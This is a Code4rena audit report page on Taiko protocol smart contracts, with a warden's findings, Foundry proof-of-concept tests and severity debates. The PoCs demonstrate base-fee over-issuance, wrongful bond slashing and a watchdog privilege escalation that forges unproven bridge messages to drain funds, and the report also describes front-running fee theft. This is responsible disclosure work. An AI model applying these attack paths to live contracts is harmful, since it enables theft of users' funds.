Platform: Code4rena
Start Date: 04/03/2024
Pot Size: $140,000 USDC
Total HM: 19
Participants: 69
Period: 21 days
Judge: 0xean
Total Solo HM: 4
Id: 343
League: ETH
Rank: 1/69
Findings: 7
Award: $39,108.58
🌟 Selected for report: 4
🚀 Solo Findings: 2
🌟 Selected for report: monrel
19855.9959 USDC - $19,856.00
https://github.com/code-423n4/2024-03-taiko/blob/f58384f44dbf4c6535264a472322322705133b11/packages/protocol/contracts/L2/TaikoL2.sol#L140-L143 https://github.com/code-423n4/2024-03-taiko/blob/f58384f44dbf4c6535264a472322322705133b11/packages/protocol/contracts/L2/TaikoL2.sol#L262-L293 https://github.com/code-423n4/2024-03-taiko/blob/f58384f44dbf4c6535264a472322322705133b11/packages/protocol/contracts/L2/TaikoL2.sol#L145-L152 https://github.com/code-423n4/2024-03-taiko/blob/f58384f44dbf4c6535264a472322322705133b11/packages/protocol/contracts/L2/TaikoL2.sol#L140-L143
The base fee calculation in the anchor()
function is incorrect. Issuance is over inflated and will either lead to the chain halting or a severely deflated base fee.
We calculate the 1559 base fee and compare it to block.basefee
https://github.com/code-423n4/2024-03-taiko/blob/f58384f44dbf4c6535264a472322322705133b11/packages/protocol/contracts/L2/TaikoL2.sol#L140-L143
(basefee, gasExcess) = _calc1559BaseFee(config, _l1BlockId, _parentGasUsed); if (!skipFeeCheck() && block.basefee != basefee) { revert L2_BASEFEE_MISMATCH();
But the calculation is incorrect
if (gasExcess > 0) { // We always add the gas used by parent block to the gas excess // value as this has already happened uint256 excess = uint256(gasExcess) + _parentGasUsed; // Calculate how much more gas to issue to offset gas excess. // after each L1 block time, config.gasTarget more gas is issued, // the gas excess will be reduced accordingly. // Note that when lastSyncedBlock is zero, we skip this step // because that means this is the first time calculating the basefee // and the difference between the L1 height would be extremely big, // reverting the initial gas excess value back to 0. uint256 numL1Blocks; if (lastSyncedBlock > 0 && _l1BlockId > lastSyncedBlock) { numL1Blocks = _l1BlockId - lastSyncedBlock; } if (numL1Blocks > 0) { uint256 issuance = numL1Blocks * _config.gasTargetPerL1Block; excess = excess > issuance ? excess - issuance : 1; } gasExcess_ = uint64(excess.min(type(uint64).max)); // The base fee per gas used by this block is the spot price at the // bonding curve, regardless the actual amount of gas used by this // block, however, this block's gas used will affect the next // block's base fee. basefee_ = Lib1559Math.basefee( gasExcess_, uint256(_config.basefeeAdjustmentQuotient) * _config.gasTargetPerL1Block ); }
Instead of issuing _config.gasTargetPerL1Block
for each L1 block we end up issuing uint256 issuance = (_l1BlockOd - lastSyncedBlock) * _config.gasTargetPerL1Block
.
lastSyncedBlock
is only updated every 5 blocks
if (_l1BlockId > lastSyncedBlock + BLOCK_SYNC_THRESHOLD) { // Store the L1's state root as a signal to the local signal service to // allow for multi-hop bridging. ISignalService(resolve("signal_service", false)).syncChainData( ownerChainId, LibSignals.STATE_ROOT, _l1BlockId, _l1StateRoot ); lastSyncedBlock = _l1BlockId; }
If anchor()
is called on 5 consecutive blocks we end up issuing
in total 15 * _config.gasTargetPerL1Block
instead of 5 * _config.gasTargetPerL1Block
.
When the calculated base fee is compared to the block.basefee
the following happens:
If block.basefee
reports the correct base fee this will end up halting the chain since they will not match.
If block.basefee
is using the same flawed calculation the chain continues but with a severely reduced and incorrect base fee.
Here is a simple POC showing the actual issuance compared to the expected issuance. Paste the code into TaikoL1LibProvingWithTiers.t.sol and run forge test --match-test testIssuance -vv
.
struct Config { uint32 gasTargetPerL1Block; uint8 basefeeAdjustmentQuotient; } function getConfig() public view virtual returns (Config memory config_) { config_.gasTargetPerL1Block = 15 * 1e6 * 4; config_.basefeeAdjustmentQuotient = 8; } uint256 lastSyncedBlock = 1; uint256 gasExcess = 10; function _calc1559BaseFee( Config memory _config, uint64 _l1BlockId, uint32 _parentGasUsed ) private view returns (uint256 issuance, uint64 gasExcess_) { if (gasExcess > 0) { uint256 excess = uint256(gasExcess) + _parentGasUsed; uint256 numL1Blocks; if (lastSyncedBlock > 0 && _l1BlockId > lastSyncedBlock) { numL1Blocks = _l1BlockId - lastSyncedBlock; } if (numL1Blocks > 0) { issuance = numL1Blocks * _config.gasTargetPerL1Block; excess = excess > issuance ? excess - issuance : 1; } // I have commented out the below basefee calculation // and return issuance instead to show the actual // accumulated issuance over 5 L1 blocks. // nothing else is changed //gasExcess_ = uint64(excess.min(type(uint64).max)); //basefee_ = Lib1559Math.basefee( // gasExcess_, uint256(_config.basefeeAdjustmentQuotient) * _config.gasTargetPerL1Block //); } //if (basefee_ == 0) basefee_ = 1; } function testIssuance() external { uint256 issuance; uint256 issuanceAdded; Config memory config = getConfig(); for (uint64 x=2; x <= 6 ;x++){ (issuanceAdded ,) = _calc1559BaseFee(config, x, 0); issuance += issuanceAdded; console2.log("added", issuanceAdded); } uint256 expectedIssuance = config.gasTargetPerL1Block*5; console2.log("Issuance", issuance); console2.log("Expected Issuance", expectedIssuance); assertEq(expectedIssuance*3, issuance);
foundry, vscode
Issue exactly config.gasTargetPerL1Block
for each L1 block.
Other
#0 - c4-pre-sort
2024-03-30T09:38:19Z
minhquanym marked the issue as sufficient quality report
#1 - dantaik
2024-04-02T04:06:09Z
This is a valid bug report. Fixed in this PR: https://github.com/taikoxyz/taiko-mono/pull/16543
#2 - c4-sponsor
2024-04-02T04:06:13Z
dantaik (sponsor) confirmed
#3 - 0xean
2024-04-09T13:06:27Z
I don't see a direct loss of funds here and believe M is the correct severity
2 — Med: Assets not at direct risk, but the function of the protocol or its availability could be impacted, or leak value with a hypothetical attack path with stated assumptions, but external requirements.
3 — High: Assets can be stolen/lost/compromised directly (or indirectly if there is a valid attack path that does not have hand-wavy hypotheticals).
#4 - c4-judge
2024-04-09T13:06:32Z
0xean changed the severity to 2 (Med Risk)
#5 - c4-judge
2024-04-09T18:32:01Z
0xean marked the issue as satisfactory
#6 - c4-judge
2024-04-10T11:34:57Z
0xean marked the issue as selected for report
#7 - 0xmonrel
2024-04-11T11:20:43Z
A halted chain leads to frozen funds. The chain will progress for a minimum of 2 blocks since the calculation is correct when lastSyncedBlock =0
and when _l1BlockID-lastSyncedBlock=1
After the second block the base fee will still be correct as long as excess < issuance
for both the inflated and correct calculating since both result in excess=1
https://github.com/code-423n4/2024-03-taiko/blob/f58384f44dbf4c6535264a472322322705133b11/packages/protocol/contracts/L2/TaikoL2.sol#L279-L282
if (numL1Blocks > 0) { uint256 issuance = numL1Blocks * _config.gasTargetPerL1Block; excess = excess > issuance ? excess - issuance : 1; }
At the block where the base fee is incorrect the chain is halted and funds are locked since the anchor now reverts in perpetuity.
In practice Taiko can easily release all funds by upgrading the contracts but I believe such an intervention should not be considered when evaluating the severity of an issue. From C4 Supreme Court session, Fall 2023
Contract upgradability should never be used as a severity mitigation, i.e. we assume contracts are non-upgradable.
I therefore believe a High is fair here
#8 - 0xean
2024-04-11T13:19:40Z
I don't entirely agree since the chain would be halted so soon in its existence, that being said, some amount of funds, albeit small, would likely be lost. @dantaik / @adaki2004 any last comments before this becomes H severity?
#9 - adaki2004
2024-04-11T15:21:18Z
I don't entirely agree since the chain would be halted so soon in its existence, that being said, some amount of funds, albeit small, would likely be lost. @dantaik / @adaki2004 any last comments before this becomes H severity?
Agreed, can do!
#10 - t0x1cC0de
2024-04-11T17:40:45Z
My 2 cents based on what I can see -
Med
severity report, however I can't see the scenario to be direct enough or have a justifiably high probability to warrant a high severity.#11 - mcgrathcoutinho
2024-04-11T17:51:23Z
Agreed with @t0x1cC0de, I think this fits the description of Medium since it's more of a leak in value.
2 — Med: Assets not at direct risk, but the function of the protocol or its availability could be impacted, or leak value with a hypothetical attack path with stated assumptions, but external requirements.
#12 - 0xean
2024-04-12T11:01:52Z
awarding as H, final decision.
#13 - c4-judge
2024-04-12T11:01:56Z
0xean changed the severity to 3 (High Risk)
8935.1982 USDC - $8,935.20
https://github.com/code-423n4/2024-03-taiko/blob/f58384f44dbf4c6535264a472322322705133b11/packages/protocol/contracts/L1/libs/LibProving.sol#L387-L392 https://github.com/code-423n4/2024-03-taiko/blob/f58384f44dbf4c6535264a472322322705133b11/packages/protocol/contracts/L1/libs/LibProving.sol#L189-L199 https://github.com/code-423n4/2024-03-taiko/blob/f58384f44dbf4c6535264a472322322705133b11/packages/protocol/contracts/L1/libs/LibVerifying.sol#L178-L189
Both validity and contests bonds can be wrongfully slashed even if the transition ends up being the correct and verified one.
The issue comes from the fact that the history of the final verified transition is not taken into account.
Example 1: Validity bond is wrongfully burned:
At step 2 Bob loses his bond and is permanentley written out of the history of P1 https://github.com/code-423n4/2024-03-taiko/blob/f58384f44dbf4c6535264a472322322705133b11/packages/protocol/contracts/L1/libs/LibProving.sol#L387-L392
_ts.validityBond = _tier.validityBond; _ts.contestBond = 1; _ts.contester = address(0); _ts.prover = msg.sender; _ts.tier = _proof.tier;
Example 2: Contest bond wrongfully slashed:
Bob was correct and T1 was ultimately proven false. Bob still loses his contest bond.
When the guardian overrides the proof they can not pay back Bob's validity or contesting bond. They are only able to pay back a liveness bond https://github.com/code-423n4/2024-03-taiko/blob/f58384f44dbf4c6535264a472322322705133b11/packages/protocol/contracts/L1/libs/LibProving.sol#L189-L199
if (isTopTier) { // A special return value from the top tier prover can signal this // contract to return all liveness bond. bool returnLivenessBond = blk.livenessBond > 0 && _proof.data.length == 32 && bytes32(_proof.data) == RETURN_LIVENESS_BOND; if (returnLivenessBond) { tko.transfer(blk.assignedProver, blk.livenessBond); blk.livenessBond = 0; } }
These funds are now frozen since they are sent to the Guardian contract which has no ability to recover them
uint256 bondToReturn = uint256(ts.validityBond) + blk.livenessBond; if (ts.prover != blk.assignedProver) { bondToReturn -= blk.livenessBond >> 1; } IERC20 tko = IERC20(_resolver.resolve("taiko_token", false)); tko.transfer(ts.prover, bondToReturn)
ts.prover
will be the Guardian since they are the last to prove the block
POC for example 1. Paste the below code into the TaikoL1LibProvingWithTiers.t
file and run forge test --match-test testProverLoss -vv
function testProverLoss() external{ giveEthAndTko(Alice, 1e7 ether, 1000 ether); giveEthAndTko(Carol, 1e7 ether, 1000 ether); giveEthAndTko(Bob, 1e6 ether, 100 ether); console2.log("Bob balance:", tko.balanceOf(Bob)); uint256 bobBalanceBefore = tko.balanceOf(Bob); vm.prank(Bob, Bob); bytes32 parentHash = GENESIS_BLOCK_HASH; uint256 blockId = 1; (TaikoData.BlockMetadata memory meta,) = proposeBlock(Alice, Bob, 1_000_000, 1024); console2.log("Bob balance After propose:", tko.balanceOf(Bob)); mine(1); bytes32 blockHash = bytes32(1e10 + blockId); bytes32 stateRoot = bytes32(1e9 + blockId); (, TaikoData.SlotB memory b) = L1.getStateVariables(); uint64 lastVerifiedBlockBefore = b.lastVerifiedBlockId; // Bob proves transition T1 for parent P1 proveBlock(Bob, Bob, meta, parentHash, blockHash, stateRoot, meta.minTier, ""); console2.log("Bob balance After proof:", tko.balanceOf(Bob)); uint16 minTier = meta.minTier; // Higher Tier contests by proving transition T2 for same parent P1 proveHigherTierProof(meta, parentHash, bytes32(uint256(1)), bytes32(uint256(1)), minTier); // Guardian steps in to prove T1 is correct transition for parent P1 proveBlock( David, David, meta, parentHash, blockHash, stateRoot, LibTiers.TIER_GUARDIAN, "" ); vm.roll(block.number + 15 * 12); vm.warp( block.timestamp + tierProvider().getTier(LibTiers.TIER_GUARDIAN).cooldownWindow * 60 + 1 ); vm.roll(block.number + 15 * 12); vm.warp( block.timestamp + tierProvider().getTier(LibTiers.TIER_GUARDIAN).cooldownWindow * 60 + 1 ); // When the correct transition T1 is verified Bob does permantley loses his validitybond // even though it is the correct transition for the verified parent P1. verifyBlock(Carol, 1); parentHash = blockHash; (, b) = L1.getStateVariables(); uint64 lastVerifiedBlockAfter = b.lastVerifiedBlockId; assertEq(lastVerifiedBlockAfter, lastVerifiedBlockBefore + 1 ); // Verification completed uint256 bobBalanceAfter = tko.balanceOf(Bob); assertLt(bobBalanceAfter, bobBalanceBefore); console2.log("Bob Loss:", bobBalanceBefore - bobBalanceAfter); console2.log("Bob Loss without couting livenessbond:", bobBalanceBefore - bobBalanceAfter - 1e18); // Liveness bond is 1 ETH in tests }
foundry, vscode
The simplest solution is to allow the guardian to pay back validity and contest bonds in the same manner as for liveness bonds. This keeps the simple design while allowing bonds to be recovered if a prover or contesters action is ultimately proven correct.
Guardian will pass in data in _proof.data
that specifies the address, tiers and bond type that should be refunded. Given that Guardians already can verify any proof this does not increase centralization.
We also need to not to not recover any reward when we prove with Guardian and _overrideWithHigherProof()
is called. If the ts.validityBond
reward is sent to the Guardian it will be locked. Instead we need to keep it in TaikoL1 such that it can be recovered as described above
+if (_tier.contestBond != 0){ unchecked { if (reward > _tier.validityBond) { _tko.transfer(msg.sender, reward - _tier.validityBond); } else { _tko.transferFrom(msg.sender, address(this), _tier.validityBond - reward); } } +}
Other
#0 - c4-pre-sort
2024-03-30T09:20:32Z
minhquanym marked the issue as sufficient quality report
#1 - dantaik
2024-04-03T01:40:28Z
This is a valid report but we knew this "flaw" and the current behavior is by design.
#2 - adaki2004
2024-04-03T09:04:32Z
I'd say acknowledged, but low severity!
This is an attack on the tier system, right ? But the economical disincentives doing so shall be granted by the bonds - not to challenge proofs which we do know are correct, just to make someone lose money as there is no advantage. The challenger would lose even more money - and the correct prover would be refunded by Taiko Foundation.
#3 - c4-sponsor
2024-04-05T06:15:18Z
dantaik (sponsor) acknowledged
#4 - c4-sponsor
2024-04-05T06:15:21Z
dantaik marked the issue as disagree with severity
#5 - c4-sponsor
2024-04-08T08:12:35Z
adaki2004 (sponsor) confirmed
#6 - adaki2004
2024-04-08T08:13:17Z
Sorry our previous response is incorrect. This one shall be considered "Confirmed" and agree with the severity.
#7 - c4-sponsor
2024-04-08T08:13:23Z
adaki2004 marked the issue as agree with severity
#8 - c4-sponsor
2024-04-08T08:13:35Z
adaki2004 marked the issue as disagree with severity
#9 - adaki2004
2024-04-08T08:13:52Z
Severity: medium, (just as: https://github.com/code-423n4/2024-03-taiko-findings/issues/227)
#10 - 0xean
2024-04-09T13:14:47Z
I am going to leave as H, I think there is a direct loss of funds here.
This comment
The challenger would lose even more money
makes me second guess that slightly, but still think H is correct and will welcome comments during PJ-QA
#11 - c4-judge
2024-04-10T11:15:58Z
0xean marked the issue as selected for report
#12 - c4-judge
2024-04-10T11:21:48Z
0xean marked the issue as satisfactory
#13 - c4-judge
2024-04-10T12:32:10Z
0xean marked the issue as primary issue
🌟 Selected for report: zzebra83
Also found by: MrPotatoMagic, ladboy233, mojito_auditor, monrel
2004.2337 USDC - $2,004.23
https://github.com/code-423n4/2024-03-taiko/blob/f58384f44dbf4c6535264a472322322705133b11/packages/protocol/contracts/L1/hooks/AssignmentHook.sol#L114-L116 https://github.com/code-423n4/2024-03-taiko/blob/f58384f44dbf4c6535264a472322322705133b11/packages/protocol/contracts/L1/libs/LibProposing.sol#L182
When proposing a block with AssignmentHook the proposer pays the prover with ERC20 tokens by approving a transfer to the AssignmentHook. If the block is not using blobs it must be called with an EOA this means that the approval and call to propose must be done in separate transactions and could therefore be front-run.
The prover can front-run the proposer to propose another block but still collect the fee from the previous proposer's coinbase since it has approved the transfer.
A proposer pays the prover by giving allowance to the AssignmentHook to transfer tokens to the prover https://github.com/code-423n4/2024-03-taiko/blob/f58384f44dbf4c6535264a472322322705133b11/packages/protocol/contracts/L1/hooks/AssignmentHook.sol#L114-L116
IERC20(assignment.feeToken).safeTransferFrom( _meta.coinbase, _blk.assignedProver, proverFee )
If blobs are not used the proposeBlock()
must be done with an EOA
if (!LibAddress.isSenderEOA()) revert L1_PROPOSER_NOT_EOA();
proposeBlock()
must therefore be called with a EOA and the approval will be done in a separate transaction.
A prover can front-run and use the previous proposers coinbase to steal their fees while proposing a different block. This block could for example be trivial and cheap to prove with ZK e.g a block that only calls the anchor()
.
foundry, vscode
A potential solution is to always use the msg.sender
of the proposeBlock()
call as the coinbase.
Invalid Validation
#0 - c4-pre-sort
2024-03-28T00:28:46Z
minhquanym marked the issue as duplicate of #163
#1 - c4-judge
2024-04-10T11:19:51Z
0xean changed the severity to 3 (High Risk)
#2 - c4-judge
2024-04-10T11:20:08Z
0xean marked the issue as satisfactory
5956.7988 USDC - $5,956.80
https://github.com/code-423n4/2024-03-taiko/blob/f58384f44dbf4c6535264a472322322705133b11/packages/protocol/contracts/tokenvault/BridgedERC20Base.sol#L75-L89 https://github.com/code-423n4/2024-03-taiko/blob/f58384f44dbf4c6535264a472322322705133b11/packages/protocol/contracts/tokenvault/adapters/USDCAdapter.sol#L43-L45 https://github.com/circlefin/stablecoin-evm/blob/0828084aec860712531e8d79fde478927a34b3f4/contracts/v1/FiatTokenV1.sol#L133-L136
The old bridge token could be stuck if the minting function reverts. These tokens can neither be bridged back nor be migrated to the new native token. For the USDCAdapter
this would happen if the max minting allowance is reached for the USDCAdapter
.
These tokens would most likely lose significant value since they are not redeemable for the actual canonical token.
Each minter has a maximum allowance in USDC, if the limit is reached minting can no happen.
To migrate a bridge token to a new native token, a user burns their token and mints native tokens through USDCAdapter
function burn(address _account, uint256 _amount) public nonReentrant whenNotPaused { if (_isMigratingOut()) { // Only the owner of the tokens himself can migrate out if (msg.sender != _account) revert BB_PERMISSION_DENIED(); // Outbound migration emit MigratedTo(migratingAddress, _account, _amount); // Ask the new bridged token to mint token for the user. IBridgedERC20(migratingAddress).mint(_account, _amount); } else if (msg.sender != resolve("erc20_vault", true)) { // Only the vault can burn tokens when not migrating out revert RESOLVER_DENIED(); } _burnToken(_account, _amount);
The USDCAdapter
mints native tokens
function _mintToken(address _account, uint256 _amount) internal override { usdc.mint(_account, _amount); }
but will revert if the allowance is reached
require( _amount <= mintingAllowedAmount, "FiatToken: mint amount exceeds minterAllowance" );
foundry, vscode
Implement functionality to allow old bridge tokens to be bridged back to the canonical token. If the max limit is reached on L2 user should be able to bridge back to L1 and claim the canonical tokens.
Other
#0 - c4-pre-sort
2024-03-30T08:08:55Z
minhquanym marked the issue as duplicate of #279
#1 - c4-judge
2024-04-10T11:33:58Z
0xean marked the issue as satisfactory
5956.7988 USDC - $5,956.80
https://github.com/code-423n4/2024-03-taiko/blob/f58384f44dbf4c6535264a472322322705133b11/packages/protocol/contracts/tokenvault/ERC20Vault.sol#L320-L335 https://github.com/code-423n4/2024-03-taiko/blob/f58384f44dbf4c6535264a472322322705133b11/packages/protocol/contracts/tokenvault/adapters/USDCAdapter.sol#L43-L45 https://github.com/circlefin/stablecoin-evm/blob/0828084aec860712531e8d79fde478927a34b3f4/contracts/v1/FiatTokenV1.sol#L133-L136
A recalling ERC20 bridge transfer can lock funds in the bridge if the call to mint tokens fail on the source chain. Depending on the Native token logic this could either be a permanent lock or a lock of an unknown period of time.
Example of how this can happen with the provided USDCAdapter:
USDC limits the amount of USDC that can be minted on each chain by giving each minter a minting allowance. If the minting allowance is reach minting will revert. If this happens in a recalled message the tokens together with the ETH value is locked.
USDC limits the amount of USDC that can be minted on each chain by giving each minter a minting allowance.
If _amount <= mintingAllowedAmount
is reached for the USDCAdapter
tokens can not be minted but since this is a recalled message the funds are stuck.
Both onMessageIncovation()
and onMessageRecalled()
call _transferToken()
to either mint or release tokens
function _transferTokens( CanonicalERC20 memory _ctoken, address _to, uint256 _amount ) private returns (address token_) { if (_ctoken.chainId == block.chainid) { token_ = _ctoken.addr; IERC20(token_).safeTransfer(_to, _amount); } else { token_ = _getOrDeployBridgedToken(_ctoken); IBridgedERC20(token_).mint(_to, _amount); } }
A recalled message to bridge USDC L1->L2 will revert when we attempt to mint through the USDCAdapter
function _mintToken(address _account, uint256 _amount) internal override { usdc.mint(_account, _amount);
On the following condition in the native USDC contract
require( _amount <= mintingAllowedAmount, "FiatToken: mint amount exceeds minterAllowance" );
Course of events that ends in locked funds:
mintingAllowedAmount
foundry, vscode
Add new functionality in the vault that allows users to send a new message to the destination chain again with new message data if onMessageRecalls()
can not mint tokens. We give users the ability to redeem for canonical tokens instead of being stuck.
Other
#0 - c4-pre-sort
2024-03-30T08:05:20Z
minhquanym marked the issue as sufficient quality report
#1 - c4-pre-sort
2024-03-30T08:08:48Z
minhquanym marked the issue as primary issue
#2 - dantaik
2024-04-03T01:37:06Z
Thank you for your feedback. In your example, if the user cannot mint tokens in USDCAdapter by using recallMessage
, the user can wait and call recallMessage
again. That's why recallMessage is retriable.
There is no perfect solution here, and I personally don't want to make the bridge too complicated by introducing this re-send-another-message feature.
Adding a warning on the bridge UI to show a warning message might be a good solution, something like "USDC on Taiko has reached 95% of its max supply cap, bridging USDC to Taiko may end up your fund becoming unavailable for some time until others bridge USDC away from Taiko".
#3 - c4-sponsor
2024-04-05T06:19:37Z
dantaik (sponsor) acknowledged
#4 - c4-judge
2024-04-09T18:31:33Z
0xean marked the issue as satisfactory
#5 - c4-judge
2024-04-10T11:33:57Z
0xean marked the issue as selected for report
#6 - t0x1cC0de
2024-04-11T02:41:23Z
Hey @0xean, flagging this for your review. Based on sponsor's comments above as well as those made here and given the prerequisite + impact, should it (and #271) still be a Med
?
Thanks
#7 - 0xean
2024-04-11T10:00:36Z
Their comments simply show their isn't a great solution to the problem, it still represents a loss of user funds (if it goes on forever) or a denial of service and a risk that users should be aware of.
@dontonka / @adaki2004 any last comments here?
#8 - 0xmonrel
2024-04-11T10:26:43Z
I submitted two related issues, this and #271. I believe #271 could be more sever since it could lock a larger portion of old USDC into a state where they can not be redeemed. I would like to confirm that the sponsor is aware of #271 and that it wasn't missed since it is tagged as a duplicate to this issue.
I am not sure if there is ground for de-duplication but either way I would like to confirm that the sponsor has seen #271.
#9 - adaki2004
2024-04-11T11:09:41Z
Their comments simply show their isn't a great solution to the problem, it still represents a loss of user funds (if it goes on forever) or a denial of service and a risk that users should be aware of.
@dontonka / @adaki2004 any last comments here?
We are OK with med, no issue. Please proceed accordinlgy - as we dont have:
But please proceed the way which is suitable for the wardens better, we appreciate their efforts. (So not questioning the severity)
#10 - dontonka
2024-04-11T12:04:58Z
I've been tagged by mistake here, I assume that was for @dantaik .
#11 - 0xean
2024-04-12T13:56:13Z
leaving as valid M and with #271 duped.
🌟 Selected for report: monrel
Also found by: Shield, josephdara, t0x1c
1085.6266 USDC - $1,085.63
https://github.com/code-423n4/2024-03-taiko/blob/f58384f44dbf4c6535264a472322322705133b11/packages/protocol/contracts/bridge/Bridge.sol#L82-L95 https://github.com/code-423n4/2024-03-taiko/blob/f58384f44dbf4c6535264a472322322705133b11/packages/protocol/contracts/bridge/Bridge.sol#L230-L231
The bridge_watchdog
role can forge arbitrary messages and drain the bridge of all ETH and tokens.
bridge_watchdog
can call suspendMessasges()
to suspend and un-suspend a message
function suspendMessages( bytes32[] calldata _msgHashes, bool _suspend ) external onlyFromOwnerOrNamed("bridge_watchdog") { uint64 _timestamp = _suspend ? type(uint64).max : uint64(block.timestamp); for (uint256 i; i < _msgHashes.length; ++i) { bytes32 msgHash = _msgHashes[i]; proofReceipt[msgHash].receivedAt = _timestamp; emit MessageSuspended(msgHash, _suspend); } }
When this function is called to un-suspend a message we set proofReceipt[msgHash] = _timestamp
. If the msgHash was not proven before it will now be treated as proven since any msgHash
with a timestamp != 0
is treated as proven
uint64 receivedAt = proofReceipt[msgHash].receivedAt; bool isMessageProven = receivedAt != 0
bridge_watchdog
can therefore forge arbitrary messages and have them treated as proven by first suspending them and then un-suspending them.
bride_watchdog
is supposed to only be able to ban and suspend messages, in the expected worst case bridge_watchdog
is limited to DDOSing messages and bans until governance removes the the bridge_watchdog
.
With the privilege escalation shown here the role can instead drain the bridge of all ETH and tokens.
Here is a POC showing that we can forge an arbitrary message by suspending and un-suspending a message
To run this POC first change the following code in Bridge.t.sol so that we use a real signalService
register( +address(addressManager), "signal_service", address(signalService), destChainId -address(addressManager), "signal_service", address(mockProofSignalService), destChainId );
Paste the below code and run into Bridge.t.sol and run forge test --match-test testWatchdogDrain -vvv
function testWatchdogDrain() public { uint256 balanceBefore = Bob.balance; IBridge.Message memory message = IBridge.Message({ id: 0, from: address(bridge), srcChainId: uint64(block.chainid), destChainId: destChainId, srcOwner: Alice, destOwner: Alice, to: Bob, refundTo: Alice, value: 10 ether, fee: 1, gasLimit: 1_000_000, data: "", memo: "" }); bytes memory proof = hex"00"; bytes32 msgHash = destChainBridge.hashMessage(message); bytes32[] memory msgHashA = new bytes32[](1); msgHashA[0] = msgHash; vm.prank(Alice); destChainBridge.suspendMessages(msgHashA, true); vm.prank(Alice); destChainBridge.suspendMessages(msgHashA, false); vm.chainId(destChainId); vm.prank(Bob, Bob); destChainBridge.processMessage(message, proof); IBridge.Status status = destChainBridge.messageStatus(msgHash); assertEq(status == IBridge.Status.DONE, true); console2.log("Bobs Stolen funds", Bob.balance-balanceBefore); console2.log("We have successfully processed a message without actually proving it!"); }
foundry, vscode
Un-suspended messages should be set to 0 and be proven or re-proven.
function suspendMessages( bytes32[] calldata _msgHashes, bool _suspend ) external onlyFromOwnerOrNamed("bridge_watchdog") { + uint64 _timestamp = _suspend ? type(uint64).max : 0; for (uint256 i; i < _msgHashes.length; ++i) { bytes32 msgHash = _msgHashes[i]; proofReceipt[msgHash].receivedAt = _timestamp; emit MessageSuspended(msgHash, _suspend); } }
Other
#0 - c4-pre-sort
2024-03-28T19:14:39Z
minhquanym marked the issue as primary issue
#1 - c4-pre-sort
2024-03-28T19:15:00Z
minhquanym marked the issue as sufficient quality report
#2 - c4-sponsor
2024-04-02T03:59:44Z
dantaik (sponsor) confirmed
#3 - dantaik
2024-04-02T04:03:55Z
This is a valid bug report. The bug has been fixed in this PR: https://github.com/taikoxyz/taiko-mono/pull/16545
#4 - 0xean
2024-04-09T13:03:50Z
Good report, but I am not sure it qualifies as H severity and most likely should be M.
I think there is a pre-condition here ( a malicious watchdog).
2 — Med: Assets not at direct risk, but the function of the protocol or its availability could be impacted, or leak value with a hypothetical attack path with stated assumptions, but external requirements.
would welcome more conversation during PJ-QA
#5 - c4-judge
2024-04-09T13:04:09Z
0xean changed the severity to 2 (Med Risk)
#6 - c4-judge
2024-04-09T18:31:46Z
0xean marked the issue as satisfactory
#7 - c4-judge
2024-04-10T11:34:41Z
0xean marked the issue as selected for report
#8 - t0x1cC0de
2024-04-10T17:38:01Z
Hey @0xean, Thanks for the review. Commenting here as the owner of #47. It's not only about:
I think there is a pre-condition here ( a malicious watchdog).
It's also about the fact that the watchdog has no way to safely suspend & unsuspend an unproven message, as described in my report.
Not sure if that qualifies this and #47 to be upgraded to High
or not, but thought it was important to highlight the fact.
Thanks!
#9 - 0jovi0
2024-04-11T01:24:45Z
Hey @0xean,
As the bridge watchdog is considered a trusted role, I believe this issue should be categorized as QA.
As per C4's Severity Categorization: "Mistakes in code only unblocked through admin mistakes should be submitted within a QA Report."
Thank you!
#10 - mcgrathcoutinho
2024-04-11T03:30:00Z
Hi @0xean, I believe this issue should be of QA-severity.
Overall, I believe this issue and it's duplicates serve QA at best.
Thank you for your time!
#11 - t0x1cC0de
2024-04-11T04:11:31Z
- The watchdog though only suspends messages if they were relayed (see relayer docs here). This automatically defies attack scenario 1. The attack is only possible if the watchdog unsuspends a fake message, which it won't since it's fake.
I believe we are mixing "relayed message" with a "message signal not yet to be received". #47 does not intend to assume a wrong input by watchdog or a malicious one. I believe therefore that #47 stands valid on its own. But it would certainly be very helpful to have the sponsor's technical insight on this before supplying any further arguments from my side.
#12 - mcgrathcoutinho
2024-04-11T04:23:48Z
I believe we are mixing "relayed message" with a "message signal not yet to be received"
Why would the watchdog suspend a message that was never relayed/signalled/created from the source chain though? I've linked the docs for that exact reason since it clearly cites how the watchdog suspends messages i.e. only after confirming the source.
#13 - 0xmonrel
2024-04-11T06:50:03Z
Privilege escalation issues are uncapped according to C4 docs and can be both MED and HIGH.
Privilege escalation issues are judged by likelihood and impact and their severity is uncapped.
Bridge watcher is supposed to only be able to suspend and ban. The worst case is supposed to be DOS for a brief moment until the user is removed, instead they are able to drain the bridge.
Severity is clearly High. Likelihood is hard to assess. What we can see from the code is that Taiko has design the system to be minimally centralized, trusted roles have limited scope and upgrades has to go through the governance system. This vulnerability bypasses all of that and gives a single role the ability to drain all assets.
#14 - 0xean
2024-04-11T09:54:06Z
Agree that if this attack is feasible, it represents privilege escalation.
as pointed out previously:
Privilege escalation issues are judged by likelihood and impact and their severity is uncapped.
Would be useful to get one final comment from @dontonka / @adaki2004 but most likely will leave as judged.
#16 - dontonka
2024-04-11T12:12:33Z
tagged my mistake also on this issue 😅. @dantaik
#17 - adaki2004
2024-04-11T12:12:47Z
Agree that if this attack is feasible, it represents privilege escalation.
as pointed out previously:
Privilege escalation issues are judged by likelihood and impact and their severity is uncapped.
Would be useful to get one final comment from @dontonka / @adaki2004 but most likely will leave as judged.
Judged.
#18 - 0xean
2024-04-11T13:25:22Z
tagged my mistake also on this issue 😅. @dantaik
sorry about that
1237.1813 USDC - $1,237.18
Judge has assessed an item in Issue #329 as 2 risk. The relevant finding follows:
L-4
#0 - c4-judge
2024-04-10T10:38:49Z
0xean marked the issue as duplicate of #274
#1 - c4-judge
2024-04-10T11:57:48Z
0xean marked the issue as satisfactory
🌟 Selected for report: MrPotatoMagic
Also found by: 0x11singh99, DadeKuma, Fassi_Security, JCK, Kalyan-Singh, Masamune, Myd, Pechenite, Sathish9098, Shield, albahaca, alexfilippov314, cheatc0d3, clara, foxb868, grearlake, hihen, imare, joaovwfreire, josephdara, ladboy233, monrel, n1punp, oualidpro, pa6kuda, pfapostol, rjs, slvDev, sxima, t0x1c, t4sk, zabihullahazadzoi
33.5408 USDC - $33.54
recallMessage()
_message.from
has not implemented the IRecallAbleSender()
interface the recall will default to only sending the ETH available.
